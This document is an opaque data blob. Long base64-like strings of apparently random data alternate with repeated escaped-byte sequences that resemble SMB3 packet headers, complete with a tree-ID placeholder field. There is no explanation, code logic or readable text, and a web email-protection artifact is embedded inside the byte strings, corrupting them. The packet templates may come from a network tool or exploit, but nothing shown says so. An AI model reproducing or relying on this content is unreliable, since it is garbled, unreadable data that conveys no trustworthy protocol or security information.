0lhwDbEzoBfYGbayxH4uzo2kVFaDMfqCsFNHOLesj2DEYYN+56MNjj9EyPeaKV6hjmvmVZaSqap4Id5bmE0ygYy4Yu8foJOgepheiUoBMJ6sEE2iJ+0kz0CiteZitgvfsY3Cw10DRvupMp14UrX43NWEZirinj+99Ay36xRs6KzpPiXRcpLbOwVY0pJPKj5UxZkG6tz5wziy0ZEsTLD0NQTA9lrxxCSQ0EupqyaW5flVuiVmD3PsIG0a6hkzNn9Ne/GJ5redmAF1DytSDWxoH4uEzdG2bN/Zlf9DW6pyBMblr3ZsZxjcLTG0dl2t+v+3k/uoWVsy9tm8c1GXe5UU6bmeQoTNckekNd1s6fIeK7wMaStu3KQjlan0TtuummxbBCHyRcwKcT6ImPlt+bk7No9m04cFBKFqZJYzYIjtGHUOgGMxsfdbjmSW3nClk98XpOoKug+2vcD0SBYrAZoqB4Mf/LLpWuZeYIbU+AEKZj2u6xb\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0s\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x83\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x93\\\\x00\\\\x00\\\\x00\\\\x10D/DXw05uM3nsKZBSrFpwHeVpMmti7+YU8twUxi/fmETh29EoL5zY+hbjAfOhm7hi5Rx2pvGAqquVaFJmRwAIT3by2C9Wxr+nF6B/GvQVstWcvFtl4fODivFcF9UleKLaZrjGi1Vb3LPBVq7I3/PkvGvqiGVbUvij5UE9KbOFH/J/t+l+m6Sj6gyKn6HBgoDLjXfLpHryGK79wEkn/iR6+uL0JwRhihfRQsS5sFe193tX4Tf3r/9Sk6zSLA6AvMUsqU2ndylrj98y2jv1hNBQFIeWeqiomegyny4p6a5bOXVkPo5jvaZzwyTREVVbzvsq16mYPCn00euJ+E8I1OgCnKJ0Ycjipny8TwX6tJ2QvUROtiL+UNkiK847XVv2IQmo7eluLJALJxOnOx09qDvH7ma6Qrc3hI9gm/v+KwVvSSNizjrvPezj/hSaESPbMA8cDFLCiHK3+8Re7QcNdIwruULbvNMYHReW4ik827va2X1tPG5Q4M45z83Viz1HQRU+W/1MLFiunllzvUDqZfdMHpd8XzhbFGLLFQdyiTBJKnQW9QohiJIL2/0wNufrJppomx4hmRpjU+eiJCYoMHENCyLuE5oA6Uc6gORTQiz3Np5Pg6dvV9GX+QydQgSwRWrER7voykEBzV9Gh+zgU9ojACqCuSNvhZYt5ZzVQh/erePCYnH16wvWRTIQEClK8mXKSNAeJL6yWuRpcb1TbyWpw/OZGpWCTeeerYwHdgvxJgF8PGGilDTjtBJObZSAvq9rWdE8C03LC/wp92WIlt6e4RhiwtPC7UgQ+iV4g0sTXIjn71VGijhiWenZNw36R0dZPm0t8uHTMdq/Lrc0Ph+omA4T1LAz21vCMy+MKJBXO2ThykAozvOGs6JCtt40KA1iF8xMS3rZPwUwPsGHH3BkkdE9sCzggb7tkO3uWnoWgv9h92qU1TPNTI24xd7AMpliVrZcAUxL9HmystQHKXx2Jr1LaLXnRrMZs/USmneQd/k8f1rAK6VqKwRsNaecaKTveb0q12gFGo/ONN8r2hYqxKJt7YHupl1DMeZPAdJTG87XnFHT3JdBjdKLsugH1Xwx4BMx3z4FVd8YFTI9syt/MySjeDhxjdM3gFKUjUF2APza3Ee55Mqa7PxGkE9QYt7g2Ps784Y7hxgynQD4IttfsgKt9hkOFexzMmv9jKwMGJFdN4RsqHu/4+AGmpAWblMb78iMLZkhd3IUwJA7f4nERdjVE99CqXCqh4Xuvb8gD16B0qeCsToEGCsZX9ZsdoSqFOVJXR38VLz1Tiw3ERUQfyhKkFtkRfahKoxsdIreCEjsYjCX7xm+CCCS6yG7D0OLmRnP6U9CFR+5I1YU3fUjR9NCPTldOI5VCQ7OXbNTPeSPg/vVd43jGuprhyvlIUkxrAWFsPJ4KdaYRvhYs7ooFyXne1lLIjiQme58pzOPwLXfV8vUqhoJF8MY6UpsManUDeNyxs/U7oai/OQwgylCrIsuE9M0WnxJLkbzlUE0DjBKBejEK7vLOCJO4SVYLqVohoqajlPzOWDMnTu4Gzugp2BJY9Z9d6x/gsnGhXKKX/7W0YNdLYu48RVKJLWtO5MTf2k5FzjAn8V/lHLiGAl/V+YU/9kahQgBl1ufh2Y+aciOqhDYgPiSZIuLo+L0rQIrsDn4K2XP0SqNOUUwp2ZKok0gDg/1O8h7UMITpVrhQvkEMcrDODxVi6MslvkeBTOrY9Np1wlGMzRbJUYy3sdLj6ohcM03LJN33loVmAgUNPWVRAeV6F70tfdzgnUf98tJ6VvKV8QSEZR7gHFD958N9Ikb/zj66YdRI/SIUt3c+fEPxFLLmSmOGQ8Rbpl1ytuv02fEoG4PhU8kVJ5BUKldbtJG23VlkEmWTKy+q2y1/e7injMOYAaUFURFjKlBftp1I3QdaPuJRmjwwsMVPRLNoZOvWtD9HteHBrxPFrR9U8VZkx2ZOf0cKEYCsVTYygtI1L8M85VxaaHPkYDa2y0r+Sfxdv2tfXIIhg18+wT/Q9D6zU5pyzNiVJnxOcSKVzGtbH3dJW5zA0sNcBq6HhtHtaTDnSRs7Zdbi+j1PwnMdnUqyBm9cB/IJRrJOcvN6UA3tFo8WvyN5dlpXwd9gShYqzjT/gUuu4PTJzHjMIDzdTaaI8Z2pKOj3vUC+0gNrPSukoJlwB0viEMZLBZfzfj90MaC6WeuJW69cztT80wkyvkBTEpqYzWH7h7GksgQCTW02Ab1uMDRtKSo3A/chOzND96XcSYsvr3gMVpemh/kgOjaC+P4yPChHzc598BCnUtHVMH256sT7yECtNg+mHAUOpJNcAjPp8aaovH05+tTyIwivny2MTZqcphUUR47cWNOolRu28hNFVGIFOPuTCID63N0dF1lhwiJoqZFEoqukVpvakjV6H4YbSleT5jbe+lSr01WHtjYeFGf98ozeBGmUaL7gk3yh9LY7Ym81y/vvZQNOJapX9BJ3+pU2nMWDQn/Bc3lFVCoHll2jLqzBWzoEIWmPdY2HJ3+ZDyBpM3IEqQUNmwez031iyoJ4YBe/UlxJSCkgLbV+Sa/Gxx0s6zI+3AUorEW/or2wFxdlURhlRmrKCHk3ipN+RFqlEbzi1HDgYAOEQwkBNIIgbaM0OQsHILhuYoQRBOis++9uVWPl5jNWLToSfgKmZT6xe0ewvsd6LUXcNIuH8ZBaSx23Db3gkd/tqi05Zg06LUb9fMYroy0LA6DutGXrbZWfs0ytPiv0lkNBtGTx3P0JWkKomt1sBLDxvuZqn19ekkd5Op9cS1ljHfXgt7QAQFvW25qCpBHkNPdz8fn1XEolubfUCGD2dq01onMaCiHJI6JUN4Rqx0xFKn8Gr+oY69mXfBlpNO2GZ6gJVmNmng8wE4H94mYqqpXhrlp8HmBJcxzJW+VytsVwwtjkV8dcFfUEy2LXibUVsZ0tfkm2XnaCOCZUHFyaKFqSTjE55pwE7+DgzsTdkzYoto+oHVumDSUFsKjuxxKOAXEWxNvSIUdEB2Za75OR8ymYK9aUq52ZNG9E13awruW7eUn6L1krq54Y4wHVB5QCkD18ZrT9S+SeOraduhHd1kgU6v98NS2PzySgSSaOT6vh8ZBAROFoy6+yEP+5qhRcCAvVhAyylGn1ORV39sHJldQYFaUMCkbTwtFn8CZbBQcag+wUtiNiVMmaoIh4yZx5oYYkfd9YnV4TzEQeB5HkvRHfHqU/CZsRTJKVl3qSOAMrhQZrKqzowfLI3LSOCf+C3bloIQu8u4SWreQ55C+o0t+/RrfMdZwKei24tlGXqWY7sch/2E+ot7kwi5fZLwO6pu39WvnI/wVWFfka8BCcMgidP7O7ql2LotXHgs5ySAdSOckbtJmo4h08XFV0p715lZEBHlbyYBewCb9agZPVPzDWKVT94uR68Kw3RFtCuXs8gGpgfGo/bT/yuScolH+ogjOOxAuoh2o+bFGQ0MZ3NVnGSlZn4wrHF6rkLqTXWH1oyt7ZFsCWV+EskFhRWbyM96a0THCcdSkLISfZXHYKkzKcgELIMM8qVBqXl8Ni2yxemE2n8zQuXsUir6z0gAKL+6dRkMcdAUt9Q+g+ygmMHxSl7Nxl/KJfGTBd8uBCY+8VB58e21lL8bLe0Go9kfDJCJ/FkZJGkVgK5F4eZX/zERhD2CyDNBrgirjwCeKgFcGDttFqudl5tXmPvJh7RQJsZ/wFX9y28zvzY/rBKNi3Mrxgsjf2p7r0pCJMOaEL+mOdlPlbLWrpY5HNwTgEtw0rV3ARznLMA9AaxJKwF3nlRi3is3k6EaWnnfQmkVI6/vJk8fZNs005MECGxLZohesLAh4eGp9F+BCg3PB4Xkmhsd5Dfj9mVz+lRw3gjEC88kX9tpxDXr8SUAw9hnBmjUrshletxdp9HC0nUiXx6rzZ54vsswauif+d89YgO1hEtsbfOP9COW58OYiqkunK012HsHOjoPyd4T2t9wKhMNDB/YX0e/ks/T4YBOhjoy/r3fDSBSIfgR5+kT6KD24XiwvrlrUP5FJN58Y2kWYbINeNDIydOipJr8Vu5fh8byKy34IbvWxzF0k4bAyWuIjebXi\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x10wTmraUrzXWEfHD1L07qNWDFDeqVkVNeNLgdHOpiYn9eR6PbyinvIIQoegYlW0IySopNdfCJfeQwPh5sbQa8ZUdSofQ13qkeX2e+niELSfzfltgyDQy36ZrqXsoGnmkCBkcWGjSA41I0h7b/KLvyDxbyiVFBmkD7M7ED8wfWjSjMVVYMgsD+VN6K3+Y4EkMHiaClZrqhlPNpou9nHHpX5bR8fS15KSItkfW7qDVmvX1lAuwXGxDZDNvvBxeOokS6Ovsp1ar412A8FGdOOWlc/Mj3yAYo0xt9eeW+pS6jXCYwiWqzvD2Gm8tf1EVfsfFvHqKPkOYhFvOZTfa9PCLAOPtymNu6BgV4gco3AeT4L59JFsYBaX1qHyTeFB0SRBqEHWAIv5dNL5lSYCq/1NVzWPf5n6Uc+289bgNgkkj2CCxVjbePMB3qnOm0HgPr6NDj6TGaq0r+qBtBENNMoW4/bFmlG3Gg/HVGlkhfbu8seDsbQsOkqoeIdcsUJy3OTSZc3jBaIVJZhZmaBZnVjbBdDA7xlIpTiUJnN7KBuPvdQKFjesNpF+/jdNI0nYWX5P4nU+Kt6BDDnaQCfoo8M3YYUZMDzr/m1MCo5NWkjVUVb+qQSxCXqFST/5i5vNVr90mg9uQEzX/KfQhEYmjPwib+7Cg2gLEiczM8bujZkmwux2s54EFB7KsGXH3A5Vh/xTtAhMheH87dl5HGXB/6X4QVegZSXwc/eArrR8n7x5cB8lO3eZI2j2ciQo6nsBc+D7vm0gjgrRzw5b3Td+Lt6V+azRlR8/Jez/xMW8ievM76g9DixTSCcfo3Qn7JX5tAMYJ9mc7Xm/6ejXMRenHblLcCCsppRy2stRvaPx9L3wpYbXARyNJRplQHgTTQhXUoKg2BjKpWcJYc3S2OBp5MSYZ3p5xYDewJVcYEV5CGv9u5GzACbmgxOH5t+IqR6wQMdBCarojjXjnpg2cV/JOEGQFMFy6z8DiTkIdUIAMypHo/FogSqbEFeS5cATqU7yk+sN/4sDv0J3kYCXlI1VWGOPCPeV/TlKYHi+JAtr5JqjzoZpBXYhrKUWEWIE8Pb5wTjdq/CPMBseTD/6Sw9N9MyBg9PTgoaZ5fDA+NzEJld/cyrDaJFmSpHFnnUKs2YB9afm3EtkG7Q4S0TykC6HxVwje5EdZsGG5AVfHJSGpc5THJCvXbst76Wnni8cTYZ3VHuLqSH3RBb1scfcvLKeM31MkqT1SW3pag/lpbVTAhI94Q/J/P2RcwJHyM7SJscu9BJB9vFldojKlxp5umYd1lwxgUaEoBVtk/5CFJzB6AfS/XhxmzEJTz0S7hn0P5W2XEQ7KjOyRQBl+QVbu8d+LnDBAdhC+pkvQYHQeB5hXW2/7byNxoZJ9blUl0J5QC2qs566ntOWJxpBzGFQqHcNWAAUcW8YAJ4Ay7qtdrNSfSTP78pxyzJ8NiAxs8OaU6dkuYbkPV1ZK3vLnhaDVZMr1Uxr6c5eiuFS5F9zA0Y5Tlvj97PQO0Ux2JD7A40Kjhtm0Vq6yVd3iXxlQ1NJs72MMIHqmciv0E2ACx61hvSgnyN2MeoefeNQE74w1UpU1cegoWZkvwZbTBc+2iN+dOQkmWWc8rHEbFrYT73FJ419GN52GBczKFe1+5dvwjTV2i3D9JKTaBUTTnQe18exClzJ9dObbiwgPkWpd52XY3Kzso2A7aPbZywY4gT4xU/TXTWOfa++kcZeEyZPVhA7nYAQ8mA